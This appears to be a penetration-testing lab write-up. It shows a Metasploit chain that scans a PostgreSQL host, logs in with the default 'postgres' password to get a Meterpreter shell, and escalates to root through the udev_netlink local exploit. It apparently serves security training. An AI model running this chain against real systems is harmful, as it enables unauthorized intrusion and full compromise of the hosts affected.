Share
## https://sploitus.com/exploit?id=C33F4650-787E-5713-9CCF-8532DC8B2214
# ๐Ÿ” Remote & Local Exploitation Lab

## ๐Ÿ“Œ Objective
Exploit a vulnerable PostgreSQL service on a Linux target (203.0.113.100), gain access using **Metasploit**, and escalate privileges to **root**.

---

## ๐Ÿ›  Tools Used
- **Nmap/Zenmap** โ€“ Network scanning & enumeration  
- **OpenVAS/Greenbone** โ€“ Vulnerability scanning  
- **Metasploit Framework** โ€“ Exploitation & post-exploitation  
- **Meterpreter** โ€“ Interactive shell access  

---

## ๐Ÿš€ Attack Flow

```bash
# 1. Scan the target for open ports
nmap 203.0.113.100

# 2. Run OpenVAS to detect vulnerabilities
/home/scripts/openvas_start

# 3. Exploit PostgreSQL with Metasploit
msfconsole
search postgres_login
use auxiliary/scanner/postgres/postgres_login
set RHOSTS 203.0.113.100
run

# 4. Launch exploit and gain Meterpreter shell
use exploit/linux/postgres/postgres_payload
set RHOST 203.0.113.100
set PASSWORD postgres
exploit

# 5. Privilege Escalation
use exploit/linux/local/udev_netlink
set SESSION 1
exploit
whoami   # root
```

---

## โœ… Outcome
- Successfully scanned, exploited, and escalated privileges.  
- Learned the full pentest chain: **recon โ†’ scanning โ†’ exploitation โ†’ privilege escalation**.  
- Demonstrated how misconfigured services can lead to **root compromise**.  

---

## ๐Ÿ“– Learning Takeaway
This lab reinforced how attackers move through the penetration testing cycle and why proactive testing is essential for securing systems.